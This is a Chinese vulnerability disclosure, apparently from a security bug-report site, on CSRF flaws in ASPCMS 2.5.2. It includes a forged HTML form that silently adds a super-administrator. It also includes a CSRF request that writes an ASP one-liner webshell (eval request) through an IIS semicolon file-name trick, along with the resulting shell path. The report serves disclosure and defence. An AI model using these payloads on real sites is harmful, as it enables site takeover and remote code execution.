ASPCMS最新版CSRF添加管理员及GetShell

### 简要描述： ~~ ### 详细说明： ASPCMS最新版2.5.2 CSRF添加管理员： 后台添加管理员的请求如下： 链接：http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add POST：GroupID=1&LoginName=111111&Password=111111&AdminDesc=111111&UserStatus=1 可以看到没有防御CSRF 我们构造伪造表单： ``` <FORM name="form" action="http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" > <TD align=middle width=100 height=30>管理员组</TD> <select name="GroupID" id="GroupID"> <option value="1" >超级管理员组</option> <option value="6" >lpyuan</option> <option value="5" >普通管理员</option> </select> <TD align=middle width=100 height=30>管理员名称</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/> <TD align=middle width=100 height=30>管理员密码</TD> <INPUT type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/> <TD align=middle width=100 height=30>管理员描述</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="AdminDesc"/> <TD align=middle width=100 height=30>状态</TD> <INPUT class="checkbox" type="checkbox" name="UserStatus" checked="checked" value="1"/> <INPUT class="button" type="submit" value="添加" /> </FORM> ``` 漏洞利用之前： [<img src="https://images.seebug.org/upload/201405/130921512b032fc833cb26fdccbf3e0205edef23.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/130921512b032fc833cb26fdccbf3e0205edef23.png) [<img src="https://images.seebug.org/upload/201405/1309220399f557ab97cc08361f5e8ba1fa911e28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1309220399f557ab97cc08361f5e8ba1fa911e28.png) CSRF添加管理员的过程： [<img src="https://images.seebug.org/upload/201405/13092226a8636103858bf4dc95b81ad37675ece1.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/13092226a8636103858bf4dc95b81ad37675ece1.png) 未作任何验证，成功添加管理员，来看看添加结果： [<img src="https://images.seebug.org/upload/201405/1309225002acc4d2e4a2126949d7c33bffdefd9a.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1309225002acc4d2e4a2126949d7c33bffdefd9a.png) CSRF直接GetShell： 后台编辑模板时，发送请求如下，我们可以添加模板的filename和filetext： http://10.65.203.100:90/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add filename=111111.asp;111111.html&filetext=%3C%25eval%20request%28%5C%27wooyun%5C%27%29%25%3E 再此过程中也没有做任何验证，而且对添加模板的文件名也没有严格处理，导致CSRF直接获取webshell： [<img src="https://images.seebug.org/upload/201405/1309284719fe8a38871224f774fd8e0292d9fe1c.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1309284719fe8a38871224f774fd8e0292d9fe1c.png) shell地址为： http://10.65.203.100:90//Templates/cn2014/html/111111.asp;111111.html ### 漏洞证明： 将详细说明